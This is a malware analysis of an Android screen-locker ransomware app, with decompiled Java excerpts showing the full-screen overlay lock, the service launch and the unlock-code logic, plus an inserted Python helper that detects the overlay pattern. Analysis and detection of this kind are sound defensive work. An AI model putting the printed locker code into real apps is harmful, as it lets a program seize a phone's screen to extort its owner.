Android Malware Sample Analysis (2)

1. Basic information

Malware name: a.privacy.fakeccb.a

File name: BWM在线

File MD5: E32377EE18BF0D853D5B45DEDFB6997D

Package name: com.qqquanquan1031606149

Threat type: ransomware (screen locker)

 

2. Basic behaviour

Immediately after launch the program locks the screen in order to extort the user.

 

3. Detailed analysis

1) A service is started from the entry function

try
{
    paramView = Class.forName("com.qqquanquan1031606149.s");   // start the service; its class file is named "s"
    startService(new Intent(this, paramView));
    return;
}


2) A floating window is created with WindowManager.addView(), and the flags field of WindowManager.LayoutParams is set to values such as FLAG_FULLSCREEN and FLAG_LAYOUT_IN_SCREEN. Combined with the SYSTEM_ALERT_WINDOW permission, this makes the floating window full-screen, always on top and impossible to dismiss, so the phone's screen can no longer be used normally.

private void createFloatView()
{
    this.wmParams = new WindowManager.LayoutParams();
    Application localApplication = getApplication();
    getApplication();
    this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
    this.wmParams.type = 2010;          // TYPE_SYSTEM_ERROR: a system window type drawn above ordinary apps
    this.wmParams.format = 1;
    this.wmParams.flags = 1280;         // changed here to 1280 = FLAG_LAYOUT_IN_SCREEN (0x100) | FLAG_FULLSCREEN (0x400)
    this.wmParams.gravity = 49;
    this.wmParams.x = 0;
    this.wmParams.y = 0;
    this.wmParams.width = -1;           // MATCH_PARENT: the window covers the whole screen
    this.wmParams.height = -1;
    this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
    this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
    this.bt = ((Button)this.mFloatLayout.findViewById(2131165190));
    this.ed = ((EditText)this.mFloatLayout.findViewById(2131165189));
    this.tv = ((TextView)this.mFloatLayout.findViewById(2131165187));
    this.bt.setOnClickListener(new View.OnClickListener()   // listener body not included in this excerpt
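As an added example (not part of the original analysis), the following Python helper decodes the raw LayoutParams numbers that the decompiler leaves behind and flags the full-screen overlay pattern described above. The constant values are the public Android API ones; the locker heuristic and the constructed SAMPLE_SRC string are my own assumptions.

```python
import re

# Public constants from android.view.WindowManager.LayoutParams (stable API values).
WINDOW_TYPES = {2002: "TYPE_PHONE", 2003: "TYPE_SYSTEM_ALERT", 2006: "TYPE_SYSTEM_OVERLAY",
                2010: "TYPE_SYSTEM_ERROR", 2038: "TYPE_APPLICATION_OVERLAY"}
FLAG_BITS = {0x8: "FLAG_NOT_FOCUSABLE", 0x10: "FLAG_NOT_TOUCHABLE", 0x80: "FLAG_KEEP_SCREEN_ON",
             0x100: "FLAG_LAYOUT_IN_SCREEN", 0x400: "FLAG_FULLSCREEN", 0x80000: "FLAG_SHOW_WHEN_LOCKED"}
MATCH_PARENT = -1  # ViewGroup.LayoutParams.MATCH_PARENT

# Matches assignments such as "this.wmParams.flags = 1280;" in decompiler output.
ASSIGN_RE = re.compile(r"\.(type|flags|gravity|width|height)\s*=\s*(-?\d+)\s*;")

def decode_flags(value):
    """Return the FLAG_* names set in a LayoutParams.flags value and any bits not in the table."""
    names = [name for bit, name in sorted(FLAG_BITS.items()) if value & bit]
    unknown = value & ~sum(FLAG_BITS)
    return names, unknown

def parse_layout_params(source):
    """Collect the numeric LayoutParams fields assigned in a decompiled method body."""
    return {field: int(num) for field, num in ASSIGN_RE.findall(source)}

def is_screen_locker_overlay(params):
    """Heuristic (my assumption) for the lock-screen pattern in this sample: a privileged
    window type that fills the whole display and is laid out over the status bar area."""
    flags, _ = decode_flags(params.get("flags", 0))
    return (params.get("type") in WINDOW_TYPES
            and params.get("width") == MATCH_PARENT
            and params.get("height") == MATCH_PARENT
            and "FLAG_LAYOUT_IN_SCREEN" in flags)

# Constructed input: the field assignments from the sample's createFloatView(), as text.
SAMPLE_SRC = """
    this.wmParams.type = 2010;
    this.wmParams.format = 1;
    this.wmParams.flags = 1280;
    this.wmParams.gravity = 49;
    this.wmParams.width = -1;
    this.wmParams.height = -1;
"""

if __name__ == "__main__":
    params = parse_layout_params(SAMPLE_SRC)
    flags, unknown = decode_flags(params["flags"])
    print(WINDOW_TYPES.get(params["type"]), flags, unknown)  # TYPE_SYSTEM_ERROR ['FLAG_LAYOUT_IN_SCREEN', 'FLAG_FULLSCREEN'] 0
    print("screen-locker overlay:", is_screen_locker_overlay(params))  # screen-locker overlay: True
```

The same parser can be pointed at any decompiled method that fills a LayoutParams, which makes the 1280 / 2010 / -1 triple easy to spot during triage of similar lockers.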

3) In the code that handles the unlock password, the author added exception handlers; the unlock only takes effect once an exception has been triggered.

this.tv.setText("解锁随机码" + this.ppss);   // ppss is the unlock code

public void onCreate()
{
    LogCatBroadcaster.start(this);
    super.onCreate();
    this.pass = ((long)(Math.random() * 10000000));   // stored as a long below; the decompiler dropped the cast
    this.passw = ((int)(Math.random() * 1000000));
    this.share = getSharedPreferences("QQ1031606149", 0);
    this.editor = this.share.edit();
    if (isNetworkConnected(getApplicationContext()))   // checks for a network connection; without one, ppss is assigned directly, and that value is the unlock code
    {
        if (this.share.getLong("m", 0) == 0)
        {
            this.editor.putLong("m", this.pass);   // random code persisted under key "m"
            this.editor.commit();
        }
        try
        {
            this.editor.commit();
            label126:
            this.ppss = (this.share.getLong("m", 8) + "");   // unlock code read back from SharedPreferences
            new Thread()
            {
                public void run() {}
            }.start();
            return;
        }
        catch (Exception localException1)
        {
            break label126;   // on exception, control returns to label126 and reads the stored code
        }
    }
    try
    {
        this.ppss = "831524";   // fixed unlock code used when there is no network connection
    }
    catch (Exception localException2)
    {
        for (;;)
        {
            try
            {
                this.password = "第六感是我爷爷";
                return;
            }
            catch (Exception localException3) {}
            localException2 = localException2;
        }
    }
}




